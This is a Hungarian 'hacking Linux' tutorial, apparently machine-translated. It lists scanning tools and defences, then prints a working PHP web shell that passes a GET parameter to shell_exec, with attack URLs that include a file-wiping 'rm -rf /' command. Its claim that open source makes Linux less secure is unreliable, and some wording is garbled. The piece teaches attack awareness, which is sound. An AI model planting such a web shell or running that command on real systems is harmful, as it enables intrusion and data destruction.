Linux operációs rendszer feltörése: Hackelés ezzel Ubuntu (Parancsok bemutatója)

A Linux a legszélesebb körben használt szerver operációs rendszer, különösen a webszerverek számára. Nyílt forráskódú; ez azt jelenti, hogy bárki hozzáférhet a forráskódhoz. Ez kevésbé biztonságos a többi operációs rendszerhez képest, mivel a támadók a forráskód tanulmányozásával megtalálhatják a sebezhetőséget. Linux A for Hackers célja, hogy ezeket a biztonsági réseket kihasználva jogosulatlan hozzáférést szerezzen a rendszerhez.

Ebben a cikkben bemutatjuk, hogy mi is az a Linux, milyen biztonsági résekkel lehet feltörni Ubuntu és a bevezethető ellenintézkedéseket.

Gyors megjegyzés Linuxon

A Linux nyílt forráskódú operációs rendszer. Számos Linux-alapú operációs rendszer létezik, mint például a Redhat, Fedora és Ubuntu, stb. Más operációs rendszerekkel ellentétben a Linux kevésbé biztonságos, ha a biztonságról van szó. Ennek oka, hogy a forráskód szabadon elérhető, így könnyen tanulmányozható a sebezhetőségek feltárása és kihasználása más, nem nyílt forráskódú operációs rendszerekhez képest. A Linux szerverként, asztali számítógépként, táblagépként vagy mobileszközként használható operációs rendszerként.

A Linux-programok grafikus felhasználói felülettel vagy parancsokkal is működtethetők. A Linux parancsok a számára Kali Linux a hackelés hatékonyabb és hatékonyabb a grafikus felhasználói felület használatához képest. Emiatt segít megismerni a hackeléshez szükséges alapvető Linux-parancsokat.

Tekintse meg ezeket az oktatóanyagokat https://www.guru99.com/unix-linux-tutorial.html hogy miként kezdjünk hozzá Kali Linux hack.

Linux hackereszközök

  • Nessus– ez az eszköz használható Ubuntu hack, scan konfigurációs beállítások, javítások, hálózatok stb https://www.tenable.com/products/nessus
  • NMap. Ez az eszköz használható a kiszolgálón futó gazdagépek és az általuk használt szolgáltatások figyelésére. Portok keresésére is használható. Megtalálható a címen https://nmap.org/
  • SÁRA – A SARA a Security Auditor's Research Assistant rövidítése. Ahogy a neve is sugallja, ez az eszköz használható a hálózatok ellenőrzésére olyan fenyegetések ellen, mint pl SQL Injection, XSS stb. címen található http://www-arc.com/sara/sara.html

A fenti lista nem teljes; képet ad a rendelkezésre álló eszközökről Ubuntu Linux rendszerek feltörése és feltörése.

Hogyan lehet megakadályozni a Linux feltörését

A Linux Hacking kihasználja az operációs rendszer biztonsági réseit. Egy szervezet a következő szabályzatot alkalmazhatja, hogy megvédje magát az ilyen támadásoktól.

  • Javításkezelés– A javítások olyan hibákat javítanak ki, amelyeket a támadók kihasználva veszélyeztetik a rendszert. A megfelelő javításkezelési szabályzat biztosítja, hogy folyamatosan alkalmazza a megfelelő javításokat a rendszeren.
  • Megfelelő operációs rendszer konfiguráció– más kihasználások kihasználják a szerver konfigurációjának gyengeségeit. Az inaktív felhasználóneveket és démonokat le kell tiltani. Az alapértelmezett beállításokat, például az alkalmazások általános jelszavait, az alapértelmezett felhasználóneveket és néhány portszámot módosítani kell.
  • Intrusion Detection System– az ilyen eszközök segítségével észlelhető a rendszerhez való jogosulatlan hozzáférés. Egyes eszközök képesek észlelni és megakadályozni az ilyen támadásokat.

Hackelési tevékenység: Hack a Ubuntu Linux rendszer PHP-t használva

Ebben a gyakorlati forgatókönyvben megtanuljuk, hogyan kell feltörni Ubuntu és alapvető információkat adunk a használatáról PHP hogy kompromittálja a Linuxot. Nem fogunk egyetlen áldozatot sem célozni. Ha ki akarod próbálni, telepítheted a LAMPP-t a helyi gépedre.

A PHP két funkcióval rendelkezik, amelyek segítségével Linux hacker parancsokat hajthatunk végre. Exec() és shell_exec() függvényekkel rendelkezik. Az exec() függvény a parancs kimenetének utolsó sorát adja vissza, míg a shell_exec() a parancs teljes eredményét karakterláncként adja vissza.

Demonstrációs célból tegyük fel, hogy a támadókezelők feltöltik a következő fájlt egy webszerverre.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ITT,

A fenti szkript a parancsot a cmd nevű GET változóból kapja. A parancs végrehajtása a shell_exec() segítségével történik, és az eredményeket a böngésző visszaadja.

A fenti kód kihasználható a következő URL használatával

http://localhost/cp/konsole.php?cmd=ls%20-l

ITT,

  • "…konsole.php?cmd=ls%20-l"a cmd változóhoz az ls –l értéket rendeli.

A parancs be Ubuntu a szerver elleni hackelésért mint

shell_exec('ls -l') ;

A fenti kód webszerveren történő végrehajtása az alábbiakhoz hasonló eredményeket ad.

Hack a Ubuntu Linux rendszer PHP-t használva

A fenti parancs egyszerűen megjeleníti az aktuális könyvtár fájljait és az engedélyeket

Tegyük fel, hogy a támadó kiadja a következő parancsot

rm -rf /

ITT,

  • Az „rm” eltávolítja a fájlokat
  • Az „rf” az rm parancsot rekurzív módban futtatja. Az összes mappa és fájl törlése
  • A „/” utasítja a parancsot, hogy indítsa el a fájlok törlését a gyökérkönyvtárból

A támadási URL valahogy így nézne ki

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Összegzésként

  • A Linux egy népszerű operációs rendszer szerverek, asztali számítógépek, táblagépek és mobileszközök számára.
  • Linux nyílt forráskódú, és a forráskódot bárki beszerezheti. Ez megkönnyíti a sebezhetőségek észlelését. Ez az egyik legjobb operációs rendszer a hackerek számára.
  • Alapvető és hálózati hackelési parancsok Ubuntu értékesek a Linux hackerek számára.
  • A sebezhetőség olyan gyengeség, amelyet kihasználva kompromittálható egy rendszer.
  • A megfelelő biztonság segíthet megvédeni a rendszert a támadóktól.